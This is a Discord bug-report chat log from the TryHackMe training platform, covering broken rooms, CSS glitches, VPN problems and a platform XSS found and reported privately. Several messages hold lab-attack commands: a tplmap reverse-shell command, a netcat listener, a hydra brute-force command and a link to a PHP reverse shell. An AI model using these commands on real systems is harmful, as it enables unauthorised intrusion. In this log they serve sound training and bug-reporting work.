#site-bugs

but will double check

Not sure if this is a bug (HTB does the same) but when double clicking on an IP address & copying, it gives you a space in front of the IP (" 10.10.51.192").

https://www.mail-tester.com/ is what I use for this kinda stuff @sly raft

has anyone done game zone

im doing again exactily what the simple walkthough says but getting errors so i dont understand why thats happening when im following it step by step

woops wrong form

@acoustic saddle be sure to only post in the help channel for this.

yeah ... when discord opens it sends me right to this page.... i would think it would send me to where i left off so i just started to type my bad

all of the images linked in runcescape under Task 3 seem to be broken

It's known!

bug

Hello, i have this on my dashboard, can't join to the undefined room i think it was removed.

that's really helpful @mortal root - thanks 🙂

@prime trellis Thats really weird, will take a look this evening - thanks for reporting

Is this a bug? I can find the room in my rooms

Search doesn't work on title

I asked for this I think

Box is down for maintence atm

@spiral flame Search should work on titke

And Attacktive Directory can't be found as its not public (its down for maintenance)

Ah right

It would seem when you boot the kali vm and you get the signin screen. That they machine sometimes doesn't get an associated ip from AWS.
This was just an observation

That's kinda funky

Hey

The box I'm trying to get into is down

It's for RP: Nmap room

You have to give it a minute

I started the machine 20 minutes ago @rugged ermine

Is that a bug?

Are you connected to the vpn correctly?

Yep

It worked like 10 minutes ago

And then went down

I tried clicking on "Extend by 1 hour" but didn't work

I tried terminating the VM and starting a new. Didn't work

Try rebooting your Kali machine, the issue is unlikely to be on our end since that room is pretty popular and you wouldn't be the only one saying something (not to be blunt)

Ok. I'll try that

Verify as well that you have only one vpn connection to tryhackme open

you can verify your connection on the access page

Pulling up my kali machine quickly to verify that there isn't an issue on the site end

Verify as well that you have only one vpn connection to tryhackme open
My Kali* is off yet it says connected

I'll try restarting it

Pulling up my kali machine quickly to verify that there isn't an issue on the site end
Appreciate your help!

you might have two instances of it open with one as a serivce

no problem

I got it, use parrot.

nah just kidding

Yeah the site looks ok, it's probably the vpn that's being weird

Yup! It worked

I think it was probably the VPN. Appreciate your help!

Thanks!

Sometimes it can act up

You're very much welcome!

Anyone tell about network pentesting ctfs platform?

Where does this come from?

it's not my path

@prime trellis Thats really weird, will take a look this evening - thanks for reporting
@frosty cape the room is https://tryhackme.com/room/bsidesgtopenmind

Eyy @spiral flame 100%

Yeah but I don't know what it's in 😄

What do you mean?

Its a getting started room guide

Maybe I should make that more clear

Yeah, it felt like it was part of a path

Oh right, Ill make it more clear

Broken link on Fowsniff CTF:

https://tryhackme.com/room/ctf

Also, not sure if this has been mentioned, but in the "Use an uploaded file" option of create a task:

Thanks fixed both 🙂

Second fix will be live this evening

I know this has been asked before, but is there any way to have debian/ubuntu images that are less than 2 years out of date running on the VMs?

@safe stump 1804 is LTS.

The restriction comes from AWS CLI which is what coverts your OVAs to AMI images to allow them to run on AWS

You're absolutely right about ubuntu! I just meant debian, sorry

Debian claim there is a Buster (Debian 10) image: https://wiki.debian.org/Cloud/AmazonEC2Image/Buster

But the wiki is known for being rather... wishful sometimes

@spiral flame

Yea, but the issue is THM can't convert it

The AMI marketplace != conversion

If the box is made on AWS, you can make pretty much anything that AWS and your wallet permits

You'd have to get skidy to spin up an instance for you and dev in the cloud (which is possible if you have something cool)

Or do it on your own cloud

sup peeps new to tryhackme just making myself known and trying to become "woke"

Thanks for the help! I'll work on it locally, and see if I can bodge it into ubuntu

np

@jmav3rick87#5325 wrong chat

my bad

Anything we can do about those not lining up?

Oh that's upsetting

I'm not a VIP user and i have this:

How i can leave to Linux Challenges ? it redirects me to https://tryhackme.com/why-subscribe

Yeah, unfortunately that is a subscriber only room - sometimes we make paid rooms free for the weekend.

room "xss", Task 8 "Filter Evasion" - #3 and #4 (still) not giving flags despite multiple successful methods of exploit

@frosty cape may i plz get the badge for retro ;-;

There's a badge for Retro!? Could I get that added too please? And preferably the extra points that must have been added since I completed it. This graph is driving me nuts:

lol

we're on par

Haha. Ah, the joys of completing it early...

and struggling for ages because the bug is clunky

Hey, at least it's realistic 😁

Pain in the rear end, but realistic

hello. there're a repeated type in "Introtox86"

further,... I think it is a picture missing

The room Crypto, fun? doesn't have 2 files in the first task 1.

Getting a really weird bug when adding a question to a task. The question is also added to every other task in the room, although the duplicates disappear on refresh.

Yep, I've had that

I've had it to

Task Creation: For some reason the "Save" button stops working if you put the first letter of words in a mnemonic in bold.

Which is really weird, because that's the same thing I've been doing when expanding acronyms and it's never taken exception to it before.

What do you mean sorry?

Stops working as in the save doesnt update the task

or you cant click save or?

The hover effects work, but nothing else. The actual onclick action fails: no "Saved" message, and no actual saving of the information

It also just dropped a bunch of information I'd typed up in another task that had supposedly saved, so it's being a bit temperamental today.

Weird, mind if you do it again?

I'm looking at the logs

Yep. Gimme a second I'll just re-bold them

Thanks

ah

Its because

The entity is too large

That task must be huge

Are you including images on it?

Try to use Imgur is possible and use image links.

🤦‍♂️
That... might explain it

Yeah, the images are on my own site though

I need to note that down somewhere 🙂

Ah ok hn

Should just be text

Yeah ok

Ill see if I can make the request larger

See whats limiting it

Ooo, yeah I can increase it

It's interesting that it's only happening when adding the <b></b> tags as well. I'll try removing them and just adding a bunch of random information

OKay great 🙂

You've got a line break feature in this!?

@orchid remnant I'd 100% recommend typing up questions and answers in Cherry Tree or something first

Yeah, definitely a request length thing @frosty cape -- doing the same when I add a few lines of random information.

Oh, don't worry, I am @spiral flame 😄

Not a huge issue when it forgets the stuff -- just need to copy it in again

I don't know if it's the right channel for this but it might apply for some people : https://security.stackexchange.com/questions/226059/nmap-with-snmp-brute-script-freezes-at-33-33

I've recently had a problem with the snmp-brute script in nmap, turns out there was a bug in the script. It is now fixed on the official SVN repository (and Git mirror). However I don't know if the changes have been pushed to the apt repository for Kali (or other Debian-based distros)

This is more for off topic @graceful bough

This channel specifically is for bugs affecting the site

Or rooms

Oh sorry ^^

Who created alfred? It's a walkthrough but there's a step missing in order to read the root flag

It's come up a bunch in roomshelp

I'll fix the room over the next 2 days :))

Have a list of the known issues

I've having constant issues with connectivity to hackpark (both front end and reverse shell) and it loads very slowly. Is this a known issue or could this just be my side?

There's a mistake in the Port Knocking room (knockknock) T1Q4, expected answer is 1000 less than it should be

Or, at the very least, I can't get it working with the expected answer, and can with the answer that it looks like it should be from the pcap file

Didn’t receive “Monthly Hacker” badge yet

It's done manually iirc

Oh

maybe i've found a bug, but i need to DM an admin for this. @frosty cape can i dm you?

Didn’t receive “Monthly Hacker” badge yet
@nocturne roost Congrats!!

Thanks!😝

You have the badge now:)

@frosty cape is there a bug with the Docker badge?

In what way?

In that I've completed the room but didn't get the badge. Are there other criteria?

If you complete a room before it's given a badge, it doesn't get added automatically @pseudo meadow. That might be it?
I know there are a couple like that for me.

@orchid remnant I'm pretty sure the badge was out by the time i started the room. It's just a strange one 😛 getting the room done was fun since I'd spent ages pre-xmas learning Docker/Kubernetes/Ansible

Ah, fair enough 😁

@pseudo meadow, some badges need updating as they may have been released after room completion

@urban flame yeah that's cool :) i know there was talk about it a while back and it's not an urgent issue ☺

runescape seems broken

SIGINT interruption on sudo password but still executes lol

I'll add it to the list

I'm probably gonna remake that box

docker-shell hangs and timeouts my connection lol

Please do haha Really intrigued by the box

It's a lot of late night jank and botching together

Thankfully this isn't one of my partnered rooms

It's a lot of late night jank and botching together
@tribal knoll said every programmer ever

This one especially

There was originally gonna be another vuln, but I gave up on it

Would really appreciate a fix though!

Haha how come?

tbf the exploit code might still be on the box for the second vuln

It was trying to make it work with no privellages

Which is ironic, considering there's like 20 entries for /bin/bash in the sudoers file on startup

That was another bug where I didn't want to go through the upload process again so I tried to fix it in the tasks and walkthrough by getting people to reset before they could notice

resetting is a good option

It's a shame docker-restore doesn't actually work then

It may work, it gives output but that's just an echo so could be broken

OH

Run sudo docker-restore

That might do it

I think you can run docker-restore as sudo, but not cp

But then cp inherits superuser from restore

Prob why it still returns the correct output

It's just a bash script without any error handling because I didn't expect any errors, so yeah

Ah! Yeah that worked

Is it possible to make your profile private on tryhackme.com?

That's not a bug but atm no

Badges' CSS alignment

Hey if you need confirmation of such css problem, I'll happily take some badges!

hello

i newbie

I don't know where to start

somebody help me 😦

Hi @warm osprey,
Maybe move this over to #general?
Bugs isn't really the place for it.
I'll give you a ping over there

these don't line up

Ill fix these css bugs tonight:)

Thanks for reporting

hello

good morning

i have problem with the alfred machine

someone can help me ?

Wrong chat.

Issue in the new linux room

Task 7, empty question

@covert kernel you right?

Gahhhhh

Thank you @spiral flame

Tell me why that's wrong

Fixed

Woooooops

Teehee

quotes doesn't fix it

Nah

I had a typo

It's fixed now

Few of these now

What task is that @spiral flame

18

Fixed @spiral flame

Nitpicky, but you don't execute to a file

Feel like this might be worded better? I don't know what it's asking as it's not rf

24 and 26 respectively @covert kernel

It's neither @spiral flame

It's in the man page

My binary doesn't have a flag for it so thonk

Rly

Wat

Might be just me

Weird

Task 32, another blank question

Ill delete the question

No don't

I'm in gitbash and I don't have a manpage

35 another blank question

How do all these

Fixed

I've got most of them that I can get without deploying the box lmao

Yeah

Most of these don't need the vm

As anyone that knows linux can figure these out

@covert kernel this is the man for RM btw

there's no absolutely everything?

oh

I get it

It's just weirdly worded

I removed the question

Maybe "Asks you for verification for each file"

@covert kernel good room though

Noot :)

All those blank questions were weird tho

Also you should try to get the true ending

It may trip you up a bit

I only had a little while to do it

Ah

I mean I could try it from my phone, but that doesn't really do it justice

Also I'll delete my messages that had answers

Error on hacktivities when sorting for "newest" it won't show up with the latest room if it was initially created on the site before being made public e.g. ZTH: Linux is on second page as was made 36 days ago

Known issue, I think the fix is on it's way

It's because publish date isn't tracked

Eh haven't seen it posted as usually have bugs muted

Yeah, I need to change the search to published date, not created.

But I updated the rooms creation date

To make it appear:)

in task 24 on Linux Room, the table says 1 = x, 2 = w, 3 = r; in the text, later, it says The digit 1 means the file can be read, the digit 2 means it can be written to, and the digit 4 means it can be executed.

Tried accessing the Windows Base machine -- got an unauthorised user error (which I'm assuming means that room isn't meant to be public). After receiving the error, the Guacamole Kali VM also stopped working, requiring authentication. Worked on redeploy, but there's something up there.

Yeah there is a weird bug when deploying & accessing 2 machines. Looking into it as we speak:)

Ah, perfect 😁

Are we meant to have access to that windows box btw?

Yes:)

Lovely

little issue regarding the time displayed on the website ... in my profile i've set the country to my actual location, but the time is off by one hour. my location is austria, maybe because of DST?

It picks it up from your browser

Timezones are complicated, a change to a countdown has been suggested and is hopefully coming

browser time is correct (checked with browserspy.dk), tryhackme is 1hr ahead nonetheless

Mistake

The file can be executed and written to by the user that owns the file ###it is not chmod 341 . it is about linux room challenge

That is right @tame inlet
-wxr----x

Write and execute for the user = wx = 0,2,1 = 3

Read only by group = r-- = 4, 0, 0 = 4

Executable by everyone = --x = 0, 0, 1 = 1

^

ok

#resources

hi

When you change your email account on tryhackme, you still get news letters on both emails

Second that ^^

Triple that ^^

will look into that :))

@white totem #room-help and you'll need more detail than that

fk sorry im tired af and missed the room

Duplicated writeup

Is this an American date? Could this maybe be either YYYY-MM-DD or pick up the local format?

Ah yes, thanks for reporting those. Will fix them:)

We love the MM/DD/YYYY format 🙂

no

America should just annex Britain

Just annex the world and make everyone use freedom units

ye no, you didn't like it when we did it to you

ain't gonna work the other way round smh

Ye

Revenge

woah, reign in the politics

I like the idea of points being measured in "freedom units"

Just use the standardised date.

@spiral flame we aren't talking politics

Just jokes about annexing countries

History innit

banter fam

this is bugs chat

Life is not easy in the real world 😉

There was a joke there

But let's go to #thm-community-media

I'm looking for lollava.. Paradox, is it you?

Si @bleak wraith

question33 of zthlinux

the requirements are already created.

They are

Uh

you see that's actually intended, I left it there so one could see how it's supposed to be done and if they wanted to replicate it

In all seriousness just go with it I guess

I do not need to create it. it was there..
ok

just this part "how you create that is up to you" confused me..

Sorry

So the directory is already made?

Did you experience this @orchid remnant?

whatever.. nice room, dude.. thank you so much.

Thank you :)

Yeah, think that might be what I asked you about yesterday @covert kernel -- all the passwords are stored in a world-readable directory

No I think he's saying

For the binary where it asks you to create a directory

It's already there

no.. the diretory and the file is already there.

Ooh, hang on, lemme check that. Sorry, didn't read that right

Can confirm what he's saying, I had the same

Oh

Ol

created 22 feb

Ok

anyone got root flag on linux challenge?

The new one @ripe helm

?

yeah

Confirm @covert kernel. Definitely there initially

@ripe helm it exists

If you need a hint we can go to #room-help

noNameCTF: running tplmap with the --bind-shell will stop the port 9090 from responding

Only solution is to re-open the box

don't use bind then

--reverse-shell works fine

that just with nc?

still works

nc -lvnp port

will get a callback which you can enjoy

its still breaking

what command are you running?

is it a syntax error or just the program not working

the whole port stops responding

what command are you running for tplmap?

||./tplmap.py -u 'http://10.10.34.61:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=' --reverse-shell 10.10.34.61 1337||

hmm that's odd

Maybe try another port? I think I used 9001

yea ill try that

oh wait

are you using python 2 or 3?

tplmap is python2

yea using 2

ok so the nc should just connect on that port or

huh?

just setup a nc listener

it should receive the callback

failing that time to do it manually

which actually is really fun

ooh how fun?

Fairly

took me a while to get it working but got it finally

||./tplmap.py -u 'http://10.10.34.61:9090/40b5dffec4e39b7a3e9d261d2fc4a038/?hackme=' --reverse-shell 10.10.34.61 1337||
@ornate moss great spoiler :v

Just about to record a youtube walkthrough of noname @warped osprey should have it ready in the coming days 🙂

Nice

ok got the first flag

just using --bind-shell seems to work

@warped osprey sorry, did you want me to delete it?

im getting a very annoying bug with one of the rooms

What room?

blue

haha, what's the issue?

the connection keeps dropping

head on over to #site-support

cool

i think i might just do a different room, this one's too easy

hello is this discord channel only for the tryhackme community?

@graceful fox #general

my room bugged, I got suddenly got disconnected from my reverse shell and I can't access the room anymore I did try restarting the room but still problem.

Probably your VPN

I also reconnected my openvpn

ok I disconnected my VPN, still saying I'm connected, how can I fix this ?

Access page doesn't update immediately @reef forge

It's almost over 5 minutes now , It should says disconnected now, yet still saying I'm connected. I restarded my machine to kill processes.

Yeah don't rely on the access page

still can't connect to my room.

IDK the problem.

Are you VPN'd?

no I'm only using openvpn

any other vpn nothing.

Are you properly connected?

I was connected while ago and got disconnected.

Ops , the room for me seems to be up now. Idk what caused it but It's up now.

They take a hot minute to boot @reef forge

yeah seems like, thanks! @spiral flame

finished a room but never got a badge

i think i know the source of the bug, the questions that require no answers are still counted as part of the room which means that you will never be able to finish the room as you cannot fill the empty fields that do not require answers

That's not it

When you click complete, those mark as completed

The room will show as completed unless you missed one

i just manged to do that, for some reason when i was doing it earlier it didnt work

why not just already include those empty fields as part of the progress

Huh? They are included

@rugged ermine @frosty cape whom to report a "Security Issue"?

@sly raft

@spiral flame

send an email to hello@tryhackme.com

Got It!

Can it be a PDF?

I along @rare swallow are making a little report on a tiny issue we found!

Isn't it be looking for hello instead of helo in the above room - Task[10]

https://tryhackme.com/room/zthlinux

I think that's an answer tolerance thing

I typed the full answer

There's an answer tolerance thing?...

Here was me thinking the only thing it did was lax capitalisation rules

It's like 20% of the answer can be wrong or something

It's funky

Huh. How odd

@wise epoch @rare swallow Daymn, nice bug report.

Thanks for reporting

Fixing this asap

You are welcome @frosty cape ❤️

@frosty cape can i dm you?

Yes:)

My thanks to @rare swallow and especially to you for being so quick!

Sorry Skidy, more CSS

@frosty cape anytime 😘

Sorry Skidy, more CSS
@spiral flame Ooo, yeah ill fix that

Thanks for letting me know

There is a write up error on the last question for crack the hash I think.

Just to clarify, Task #2 Question #4? @crystal escarp

I've completed the room, and it looks okay to me at least 🙂

It says use mode 1100

I had to use hash mode 160

For room https://tryhackme.com/room/crackthehash?

Yeah

Doesn't say a mode?

Just says sha hmac

The first two write ups say use mode 1100

Oh, weird

hashcat probably changed that

I mean HMAC-SHA1 -> 160 IIRC

Yeah

Writeups are out of our control

Gotcha. Didn’t know. It’ll throw ppl off for sure if they are lost and trying to figure it out lol

Oh yeah it's 473 days old so, you could be reading a write-up that's just as old and they may of changed it hehe

Writeups are external to THM in that sense

Could be. Bc the third write uses 110 🤷‍♂️

Which write-up @crystal escarp?

Deskel and glarisant use 1100

Sckull uses 110 but they could be out of date. Didn’t think about that.

@tawdry totem ^^

Oh, Sckull's is the third

DesKel isn't around much just now, but he might be able to update

I don’t really care I figured out the right one on my own so it’s all good. Made me work for it.

Good attitude 😁

😉

Good job, thanks for reporting regardlessly though!

No problem.

I work on the blue team right now but pentesting is what I want to do eventually. Blue team is so boring.

Great stuff here.

Hehehe, boring in comparison sure 😛

THM is imho a great way to get into the red-team side of things!

lil bit of blueteam on there, but mostly redteam focussed

The community on here is great too... so any issues are usually resolved rather quickly and efficiently

Yeah hackthebox is nice but it’s hard to learn unless you follow a video and that’s no fun.

Yeah friendly, I expected most to be rude when you ask a question but it’s the opposite.

The community here is great

We're kinda suffering from an influx of help just now (and a few trolls popping up, which I don't think I've ever seen before here)

But generally speaking the community is great

Hopefully things will settle down a bit soon 😄

🙂 Well going to find another fun box, peace.

Go for it 😁

Nice! GL HF, there's always #room-help should needs be :^^

uh what

@spiral flame or someone, could they provide with the text format of a voucher code, plz ?

A couple alphanumeric digits

a couple means 2 lol

6 mixed case alphanumeric characters @rare swallow

Thank you ❤️

I had to go count

Now I'm worried

loooool

i'm subscribed anyway

What Cyber Games @frosty cape it's poiting to a 404

opps

Let me fix that

cool, thanks

i dropped you an email on hello@tryhackme.com @frosty cape , let me know what you think

hey i need help

i am solving the Blue challenge https://tryhackme.com/room/blue

the shell exploit works

but not the shell_to_meterpreter

#room-help @ancient crater

That's not a bug

oh sorry

No problem 😄

i thought the machine might not be vulnerable

Nah, it's just unpredictable

I like that phrasing

@orchid remnant

Unpredictable

Turns out it's a metasploit issue not a Blue issue

Dark's reputation is safe on this one

Mhm

What, the redirect @covert kernel? 😄

So you can change the font for the description section of tasks

But not for the questions

But the questions will use a different font if they're pasted with it

Eg from google docs

Uploading to THM slows down the rest of the site massively for you due to the throttling, you basically DoS yourself

^^

I will look into another upload method

Think its time I change it aha

is this still relevant?

kali 2018 task

One thing now, it doesn't seem to select a task by default for editing on Manage Rooms

But one is "selected" in the dragging section

Also, what happened

Might be because I'm uploading and that's impacting API requests

Yep I think it's the API requests being very slow

Room hint on Ice recon should be changed, -sC no longer tells you the service that's listening on 8000 (Task 2 Q 4) @rugged ermine

-sV will do it

lemme update that now, good catch @spiral flame

Wasn't me, it was @sinful plover so credit to them

@sinful plover good catch 😄

Fixed!

if you look at the hint before you add the answer usually the asterisks match the length of the word, in that case there's 7 asterisks space 4 asterisks space 8 asterisks but the answer is 4 space 4 space 8

@sinful plover oh, maybe execute instead of exec

ah, but the hint points to the Vulnerability Type on cvedetails which lists it as exec, just thinking of n00bs like me 🙂

Yep

Weird

Task4 question 4 the answer works if you enter ||x86|| but the system clearly is ||x64|| when you run the sysinfo command

Oh poor dark

lol, i am done with Ice now..😆

fixed

I think half asleep dark typed the answer to that question originally

@warped osprey you've got a typo in NoName for the record. Root flag starts with "THN," not "THM"

Great box btw 😁

@warped osprey you've got a typo in NoName for the record. Root flag starts with "THN," not "THM"
@orchid remnant ahha yep

Ah, sorry, did you already know? 😅

@worthy stag report this

Oops, fair enough 👍

Hey, it works. We know what you mean 😄

@hollow arch is there meant to be a HTTP server running on your new box?

Because, uh, there doesn't appear to be

@orchid remnant I hope next boot2root machine it's more interesting.

and thanks for the feedback.

No problem 😁

I can't comment on the next ones being interesting, given I have no idea if it's one of my submitted ones that will get picked 😆

xD

Hey, if it is one of mine, I hope it will be interesting at least

I'm biased though

@orchid remnant is there a bug with the XXE box?

Yeah...

There's no webserver on it...

Or, if there is, it ain't running

how long have you given the box?

Just going on an hour and a half

I'll rescan it now, but all I was getting was SSH

Same with @frigid path

defo sounds like somethings up

if i had VIP active, id try it

And from the fact he's not got the last question, I would guess that @urban flame hasn't got it working either

Aye. Just done a new scan @sly raft. Same results. SSH and nothing else

you've tried scanning all tcp ports asw?

Well, sounds like I should deploy it

doit

I've tried nmap -sV -p- -vv <target-ip>

Just done namp -Pn -p- -vv <target-ip>

yeah, you woulda grabbed it

I am now going to try nmap -A -p- -vv <target-ip> but I don't hold much hope

@orchid remnant huh, you have the answer tho

me thinks someone forgot a systemctl enable apache2

Yep ^^

Oh, it gives you the answer to the second last answerable question in the question after it @spiral flame

The username is easy. The password you have to exploit for

you have q5

That... Looks like a bug

Definitely a bug. Good thing we're already in #site-bugs

@frosty cape we got a good one for you

I thought rooms were tested thoroughly...

You're doing the testing 😁

That's not a dig at the admins, just weird that we missed this

Not yet

feature needs implementing

Yeah, I know 😄
Couldn't resist though

It is weird

There are a lot of little interesting things in that room. It's really interesting content, but there's also the giving a flag in the subsequent question. You'd think that would be caught too

Thanks for pinging @orchid remnant

sorting it out with the room creators

Cool 👍

Might take until tomorrow because different timezone

but most of the room should be doable

Yep, it's really just the last task that's broken. Rest of the room is great 😄

if you guys need room testers, I hear @tribal knoll has nothing going on except seeing a stupid amount of raid shadow legends adverts

I thought rooms were tested thoroughly...
@spiral flame They can only be tested so much

@frosty cape I mean, walk it through once it's deployed?

please

yeah, thats what i was thinking

it burns

Ah, @sly raft reviewed this one (sorry to throw you under the bus there bud)

it seems like a huge oversight

There's also an answer given in a question. Feels like there might be a better way to word that one?

Obviously much less important than the box working though

yep that's my bad - sorry about that

I remember reviewing a room from the same person that had issues

Wait, you get to review rooms already? @tribal knoll

I did some for dark when he was moving

ah

I'm going to do the code for room reviewer's this weekend, so Sunday more people can get involved.

awesome

as the man himself would say in this situation

dank

Will that program be expanding any further at any point in the future, would you imagine @frosty cape?

Yes, as we have more rooms created, more and more will need to be reviewd.

But for now 2 more is what we need:)

Yeah, reckon you've probably got more than enough with James and Dan 😁
I'd be interested in applying in the future though -- let us know when it scales up a bit! 😄

ah, this is where the bugs get submitted. lol...the new room xxe is up now. Thank you for fixing it.

Hi guys today i join tryhackme 🙂

Eyy, welcome:)

Welcome

My enter not work in Terminal , with Kali Browser ?

What do you mean?

i can't hit ENTER

ou should be able to?

Try clicking "Access in browser"

now fixed sometimes not work

Can i make it smoother ?

Weird, not heard of that bug before

If you want yeah?

How ?

I am not sure, you asked it like a question

Try RDP'ing into the machine using a RDP Client

And not in browser

That might make it slightly smoother?

i see , i will try

where can i see Credential ?

In the Kali room tasks

Vulnversity, T4Q5. www-data is actually running the web server, the user it wants is not but is another user on the system

Either the question should be reworded or the answer changed

i try connect with RDP , it connected but i have Black screen

Give it a few mins

ok

Hei @frosty cape did you get a chance to look over my messages?

am i should change root password ?

It's a VM with a public IP

With services open

With potential default credentials

On AWS ip ranges.

Yes. You should.

yes , but why not mentioned on Kali room

and if i Terminate it and deploy again , new VM has been Created ?

yes

thnaks ,

I mean technically the password isn't a default

i got it .

is there any timezone i can see when my VM Terminate ?

Its changing to a countdown

So stop the date issues 🙂

<3 <3 @frosty cape

@frosty cape Good news , also its good add auto add 1 hour check mark i forgot to add 1 hour before terminate and it gone

Yeah it should alert you

you mean alert will be add ?

Its already added, but if your time is messed up it wont show

Will be fixed next few days

thanks 🙂

Hi guys. Advent of Cyber only has port 111 open! Am I missing something?

Which day @gritty umbra?

Day 1 😀

How long has it been up for?

a few minutes

Give it another couple (they can take up to five on the outside), then try redeploying?

ok I scanned again it's open now

my bad

Ah, perfect 😁

thank u

Np!

has anyone addressed the T2Q2 hackpark hydra command? The supplied command format (hydra -l <user> -P /usr/share/wordlists/<wordlist> <ip> http-post-form) doesn't work after filling in the blanks with usable info (hydra -l admin -P /usr/share/wordlists/fasttrack.txt 10.10.8.103 http-post-form) and gives the error:

[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: (null)

The learner is then supposed to figure out how to fill in what's missing somehow? Just curious if this has been asked/answered already.

envoyer moi svp le lien tryHackMe

@remote laurel can we get a translator?

please send me tryhackm lien

@fervent grotto https://tryhackme.com/ ?

tkank you

@frosty cape Got a bug in https://tryhackme.com/room/thefindcommand
T3Q6 Looks to have been changed. The current answer is very definitely not the right one.

(My french is more or less non existant)

It's just missing a chunk from the answer

Yep ^^

It looks okay to me?

Could I DM you with a screenshot of the answer and command @frosty cape? It, uh, looks a little odd

@orchid remnant Can I dm you a breakdown of my answer?

Course, go for it 😄

envoyer moi svp le lien tryHackMe
@fervent grotto https://tryhackme.com/room/hackpark

I learnt a new french word though, so that's nice

@covert kernel Can you update your message? The question's wording could be clarified, as it means others as in u/g/o rather than a unix group, and it's definitely missing the file extension

Actually this points at a slightly more serious issue

@spiral flame what message

In bugs submissions

Oh

There's a platform bug it turns out

Ok

So it's only the clarification

There's a platform bug it turns out
@spiral flame oh what's this?

MuirlandOracle and I are discussing it rn

Possible XSS

Can I shoot you a DM?

If we can get it working

@frosty cape

definitely a platform bug, potentially a dangerous one

Oh well that's no good

@frosty cape your sanitisation bork

This needs to be a DM

Okay yeah DM me please

Haven't got it working, but I have a definite issue

Oki, DM away:)

@frosty cape Got a working payload

Can I send it to you?

@orchid remnant and @spiral flame good job on your discovery

It's such a rush

That ^^

That is one hell of a rush

Time to pour out a whiskey to celebrate

First XSS in the wild

I've got to take the dogs out, but after that, I'm with you on that one

Interested to know what field you found this in

Presumably the field to answering questions

Oh dang

Well done lads, one more thing like that and you can join ya Boi in the Bug rank

Thought it was three?

I'm not sure tbh, just keep going 😂

it's 3 as far as i am aware

@frosty cape your new filter might be too strict... 😄
I've got an answer in a room that contains < >

Not being accepted, even as a copy and paste straight from the answer page

minor bug - informative: Users can modify the university when creating a team by intercepting the request and modifying it to whatever they want. Lack of sanitisation maybe?

university

@frosty cape your new filter might be too strict... 😄
I've got an answer in a room that contains < >
@orchid remnant Huh?

minor bug - informative: Users can modify the university when creating a team by intercepting the request and modifying it to whatever they want. Lack of sanitisation maybe?
@worthy stag Noted

Just spoken to Ashu, we're going to bring another part-time developer on-board. So you will see lots of these get fixed soon. I'll introduce the new THM guy on discord in the next few weeks.

@orchid remnant Huh?
@frosty cape
One of the answers in a room I've been working on is ||ping <target>||
It's accepted in the task creation screen, but can't be entered in the normal question answering view.

Pulls an incorrect answer, even when copied and pasted directly from the answer page.

@frosty cape
One of the answers in a room I've been working on is ||ping <target>||
It's accepted in the task creation screen, but can't be entered in the normal question answering view.
@orchid remnant Ah okay, thats high on my list to fix

Thanks for reporting

Perfect 🙂

I had this when looking for the XSS. Some strings would be valid on creation but make the question unanswerable

@frosty cape is MACHINE_IP meant to work in questions, or just task descriptions?
Because if it's meant to work in questions, it doesn't appear to be

All

Whats the room?

I'll take a look

My introtonetworking for Ashu

Traceroute task

Chance I'm just messing the syntax up

Do you have it in a code block?

Hi all

No -- although that might be it 😁
Can you actually put code blocks in questions?

I'm new to security

Yeah I believe so! @orchid remnant But if not, that'll be the reason why - MACHINE_IP needs to be in a code code block to work 🙂

Well that failed

Lol

As it turns, you can do it in the task description, not the question by the seems

seems to be limited formatting options for the actual question text

That'd be a nice thing to add

Mhm
Skidy said it should be possible though

Huh

Oh

Maybe the filter broke it?

That, wouldn't surprise me

Possibly not though, given apparently they need to be in code blocks

Yeah

Don't think that's ever been possible?

Machine IP needs to be in code blocks

I mean it works in the description without code blocks

Works for me

In that room @frosty cape?

Ah

Haven't tried it as part of a question

Ill update so it works with <code> tags

It's never worked for me outside of code blocks

Weird

Oh, update it so we can use code tags in questions, Skidy?

only works in code tags, or? @frosty cape

Without tags

Im updating the code to include it:?)

Wait it works for both

With me

Weird. Browser thing maybe?

Never had a problem with it before

Locally, not tried it on your room

1 sec

Which task does the deploy have?

7

@orchid remnant On the questions, you only have a limited HTML editor

So things like <code> don't work

And then, the <code> is treat like a string

So it wont identify it

Oh, I know -- I tried adding that at CMNatic's suggestion when it didn't work the first time

Just in case

Ah ok:)

Try just coloring it red

Text or background?

That looks good tbh

Text

Ah, that did it

Thanks Skidy!

Nay worries

Hello

So my search is broken

In My Rooms

Not in hacktivities

Same ^^

Uh, I can assure you, that was just from trying to login...
Firefox mobile browser

why sometimes Paste not work on Browser ?

ctrl shift v if you are talking about kali @worldly pagoda

@orchid remnant any hint on that misterius file from Learn L:inux task 43

?

If you're meaning ll then yeah, you don't need it @covert kernel

Also, #room-help

yep

thanks

but wehre is located

where*

@rare swallow no i mean other

why i can't access http://10.10.123.52:3333/

i connect to vpn , and have ping

but web server not up

Is there a webserver on that port @worldly pagoda?

yes

Which room is it?

Vulnversity

Task 3

And it came up in the nmap scan I take it?

[Task 4] Compromise the webserver

I take it you've scanned the server with nmap and it found the webserver?

Sometimes they take a little while to fully start up

i scanned again

[Task 4] Compromise the webserver

3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Hmm, OK, that should be working then. Can you curl it?

curl http://10.10.123.52:3333

yes curl is okey :-?

from kali its okey

but on my box not opened

Are you connected to the VPN from your host, or from your kali VM?

but on my box not opened
@worldly pagoda what do you mean?

@spiral flame on my Computer i can't access to that web address but in kali linux i have access , i have ping on my computer

Are you connected to the VPN on your computer?

Where are you using kali? @worldly pagoda

Ping working doesn't mean you're pinging the right host.

yes i connect vpn on my Computer

Is that the VM, or the Host?

Where's kali running?

i connect to Kali with RDP

Uh. Where is the Kali box?

Is it the THM one?

yes

You don't need the VPN at all then

But it makes it even weirder that you can't access the site.

yes really weirder

You said that curl works, yes?

@orchid remnant they can't access the site from their computer

from kali yes

They can from kali

It's not broken, just use the kali vm.

yes but kali was not Smooth and i wont use at my pc anyway np i continue with kali on thm

Not a bug, head to #site-support

Sounds like a VPN issue then. Probably the classic more than one connection simultaneously.
That would work with the Kali VM given you're not using the VPN through it, but would explain why it doesn't work locally.

to get Reverse PHP shell on kali linux am i should do something ?

What do you mean @worldly pagoda?

As in, how do you catch the reverse shell connection?

any firewall or something ?

No, there's no firewall. Not on the Kali machines anyway

#room-help

i try "https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php"

Also that ^^

I'll answer in #room-help @worldly pagoda

@orchid remnant Thanks

#room-help

I need help with the escalation privilege in Blue

@worldly pagoda could you help me bro?

@autumn garnet you too, #room-help

Thanks

